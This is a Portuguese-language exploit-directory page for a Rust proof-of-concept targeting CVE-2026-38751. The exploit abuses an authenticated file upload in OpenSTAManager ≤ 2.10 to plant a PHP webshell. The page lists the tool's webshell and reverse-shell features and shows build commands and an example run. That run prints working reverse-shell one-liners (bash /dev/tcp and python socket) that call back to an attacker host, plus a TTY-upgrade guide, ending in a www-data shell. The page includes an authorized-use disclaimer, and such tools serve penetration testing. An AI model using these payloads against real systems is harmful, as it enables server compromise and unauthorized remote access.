Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
OpenSTAManager-RCE-Exploit-CVE-2026-38751 — OpenSTAManager-RCE-Exploit-CVE-2026-38751 | Kitploit
Ferramentas/GitHubGitHub/b0ysie7e/openstamanager-rce-exploit-cve-2026-38751
Análise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
b0ysie7e/openstamanager-rce-exploit-cve-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

Ver Repositório
8há 1 mêsAinda não revisado

Exploit RCE do OpenSTAManager (CVE-2026-38751)

Upload Arbitrário de Arquivos que leva à Execução Remota de Código
Prova de conceito completa para CVE-2026-38751, escrita em Rust.

Aviso: Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais. Utilize-a apenas em sistemas de sua propriedade ou para os quais tenha permissão explícita para testar.


Descrição

OpenSTAManager ≤ 2.10 é vulnerável a um upload arbitrário de arquivos autenticado que permite a um atacante enviar um arquivo ZIP malicioso contendo um webshell PHP. Este PoC automatiza o processo:

  • Login com credenciais válidas
  • Upload de um módulo malicioso com um webshell
  • Verificar a vulnerabilidade
  • Web shell interativo (execução de comandos)
  • Reverse shell com manipulação de TTY (vários payloads)
  • Limpeza do backdoor enviado

Funcionalidades

FuncionalidadeDescrição
LoginAutentica usando as credenciais fornecidas.
Geração de ZIPCria um arquivo ZIP com um descritor MODULE válido e um shell PHP.
Upload de arquivoEnvia o ZIP malicioso através do mecanismo de atualização.
VerificaçãoVerifica se o shell está acessível e executa um comando de teste (id).
Web shell interativoPermite executar comandos interativamente através do webshell (-i).
Reverse shellEnvia múltiplos payloads (bash, python, base64, nc, mkfifo) para obter um shell.
Instruções de upgrade de TTYMostra um guia passo a passo para obter um TTY totalmente interativo.
LimpezaRemove o shell.php enviado automaticamente (a menos que --no-cleanup seja usado).

🛠️ Requisitos

  • Rust (1.70+)
  • Um alvo executando OpenSTAManager ≤ 2.10.
  • Uma conta de usuário válida (com senha) para fazer login.

Instalação

Clone o repositório e compile o binário:

root@kitploit:~
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help

Exemplo:

root@kitploit:~
$ ./openstamanager-rce-exploit --url http://target.com/ -U <user> -P <password> --lhost 10.10.14.5 --lport 4444

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'

[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows <rows> columns <cols>
[*]    (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.

bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
Baixar ferramenta